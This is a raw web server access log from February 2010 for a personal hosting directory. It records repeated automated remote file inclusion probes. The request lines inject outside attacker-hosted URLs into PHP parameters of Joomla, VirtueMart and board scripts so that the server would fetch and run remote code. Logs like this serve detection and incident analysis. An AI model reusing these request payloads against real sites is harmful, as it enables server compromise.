113.29.236.67 - - [02/Feb/2010:05:24:27 -0800] "GET /~t290/logs////?_SERVER%5BDOCUMENT_ROOT%5D=http://188.165.37.25/Nea/ftp/FxID1.txt?? HTTP/1.0" 200 13359 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0" 0 web.hypersurf.com
118.217.5.166 - - [02/Feb/2010:05:25:17 -0800] "GET /~t290//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 327 /home/users/t/t290/public_html/skin "-" "Mozilla/5.0" 0 web.hypersurf.com
118.217.5.166 - - [02/Feb/2010:05:25:17 -0800] "GET /~t290/logs/access.log%20%20//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 345 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
118.217.5.166 - - [02/Feb/2010:05:25:17 -0800] "GET /~t290/logs//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 332 /home/users/t/t290/public_html/logs//skin "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:25:41 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:25:41 -0800] "GET /~t290/logs/access.log.0%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:25:41 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:25:43 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:25:43 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:25:43 -0800] "GET /~t290/logs/access.log.0%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
118.217.5.166 - - [02/Feb/2010:05:25:49 -0800] "GET /~t290//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 327 /home/users/t/t290/public_html/skin "-" "Mozilla/5.0" 0 web.hypersurf.com
118.217.5.166 - - [02/Feb/2010:05:25:49 -0800] "GET /~t290/logs/access.log%20%20//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 345 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
118.217.5.166 - - [02/Feb/2010:05:25:49 -0800] "GET /~t290/logs//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 332 /home/users/t/t290/public_html/logs//skin "-" "Mozilla/5.0" 0 web.hypersurf.com
118.217.5.166 - - [02/Feb/2010:05:27:42 -0800] "GET /~t290/logs//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 332 /home/users/t/t290/public_html/logs//skin "-" "Mozilla/5.0" 0 web.hypersurf.com
118.217.5.166 - - [02/Feb/2010:05:27:42 -0800] "GET /~t290/logs/access.log%20%20//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 345 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
118.217.5.166 - - [02/Feb/2010:05:27:42 -0800] "GET /~t290//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 327 /home/users/t/t290/public_html/skin "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:05 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:05 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:05 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:14 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:14 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:14 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:18 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:18 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:18 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
118.217.5.166 - - [02/Feb/2010:05:28:19 -0800] "GET /~t290//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 327 /home/users/t/t290/public_html/skin "-" "Mozilla/5.0" 0 web.hypersurf.com
118.217.5.166 - - [02/Feb/2010:05:28:19 -0800] "GET /~t290/logs/access.log%20%20//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 345 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
118.217.5.166 - - [02/Feb/2010:05:28:19 -0800] "GET /~t290/logs//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 332 /home/users/t/t290/public_html/logs//skin "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:22 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:22 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:22 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:25 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:25 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:25 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:25 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:25 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:27 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:27 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:30 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:32 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:41 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:41 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:41 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:41 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:41 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:42 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:42 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:42 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:44 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:55 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:55 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:28:55 -0800] "GET /~t290/logs/access.log.0%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:29:02 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:29:02 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:29:02 -0800] "GET /~t290/logs/access.log.0%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:29:51 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:29:51 -0800] "GET /~t290/logs/access.log.0%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:29:51 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:29:51 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:29:51 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:29:51 -0800] "GET /~t290/logs/access.log.0%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:31:12 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:31:12 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:31:12 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
201.199.194.8 - - [02/Feb/2010:05:41:07 -0800] "GET /~t290/logs/access.log///?mosConfig_path=http://ppkiajember.com/auto1.txt?? HTTP/1.1" 404 304 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
201.199.194.8 - - [02/Feb/2010:05:41:07 -0800] "GET /~t290/logs///?mosConfig_path=http://ppkiajember.com/auto1.txt?? HTTP/1.1" 200 13391 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0" 0 web.hypersurf.com
201.199.194.8 - - [02/Feb/2010:05:41:07 -0800] "GET /~t290///?mosConfig_path=http://ppkiajember.com/auto1.txt?? HTTP/1.1" 200 904 /home/users/t/t290/public_html/ "-" "Mozilla/5.0" 0 web.hypersurf.com
211.239.124.204 - - [02/Feb/2010:05:41:32 -0800] "GET /~t290//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 296 /home/users/t/t290/public_html/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
211.239.124.204 - - [02/Feb/2010:05:41:32 -0800] "GET /~t290/logs/access.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 312 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
211.239.124.204 - - [02/Feb/2010:05:41:32 -0800] "GET /~t290/logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs//index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:42:22 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:42:22 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:42:22 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
122.203.53.135 - - [02/Feb/2010:05:43:34 -0800] "GET /~t290/logs/access.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 312 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
205.234.231.31 - - [02/Feb/2010:05:44:16 -0800] "GET /~t290///?mosConfig_path=http://ppkiajember.com/auto1.txt?? HTTP/1.1" 200 904 /home/users/t/t290/public_html/ "-" "Mozilla/5.0" 0 web.hypersurf.com
205.234.231.31 - - [02/Feb/2010:05:44:16 -0800] "GET /~t290/logs///?mosConfig_path=http://ppkiajember.com/auto1.txt?? HTTP/1.1" 200 13391 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0" 0 web.hypersurf.com
205.234.231.31 - - [02/Feb/2010:05:44:19 -0800] "GET /~t290/logs/access.log%20%20///?mosConfig_path=http://ppkiajember.com/auto1.txt?? HTTP/1.1" 404 306 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
